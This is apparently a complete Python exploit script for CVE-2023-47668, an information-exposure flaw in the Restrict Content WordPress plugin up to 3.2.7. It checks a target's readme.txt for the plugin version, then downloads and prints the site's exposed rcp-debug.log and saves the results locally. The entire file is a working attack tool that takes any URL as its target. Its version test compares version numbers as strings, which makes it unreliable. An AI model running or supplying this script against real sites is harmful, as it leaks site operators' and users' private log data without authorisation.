import requests import sys #exploit by : Nxploit Khaled_alenazi def check_url(url): readme_url = f"{url}/wp-content/plugins/restrict-content/readme.txt" try: response = requests.get(readme_url, timeout=10) if response.status_code == 200: if "Stable tag:" in response.text: lines = response.text.splitlines() for line in lines: if "Stable tag:" in line: version = line.split(":")[-1].strip() if version <= "3.2.7": message = f"[!] The site {url} is vulnerable (Stable tag: {version})" else: message = f"[+] The site {url} is not vulnerable (Stable tag: {version})" return message return f"[-] Stable tag not found in {readme_url}" else: return f"[-] Failed to access {readme_url} (Status code: {response.status_code})" except requests.RequestException as e: return f"[!] Error while accessing {readme_url}: {e}" def read_info_log(url): log_url = f"{url}/wp-content/uploads/rcp-debug.log" try: response = requests.get(log_url, timeout=10) if response.status_code == 200: content_message = f"[!] Log file found at {log_url}\n\nLog file content:\n{response.text}" return content_message else: return f"[-] Log file not found at {log_url} (Status code: {response.status_code})" except requests.RequestException as e: return f"[!] Error while accessing {log_url}: {e}" def log_to_file(message): with open("log.txt", "a") as log_file: log_file.write(message + "\n") print("[+] Result saved to log.txt") if __name__ == "__main__": if len(sys.argv) != 2: print("Usage: python CVE-2023-47668.py ") print("CVE-2023-47668 - Restrict Content 3.2.7 - Information Exposure via legacy log file") sys.exit(1) target_url = sys.argv[1].strip() print("\n[1] Checking readme.txt") result = check_url(target_url) print(result) log_to_file(result) print("\n[2] Checking rcp-debug.log") result = read_info_log(target_url) print(result) log_to_file(result)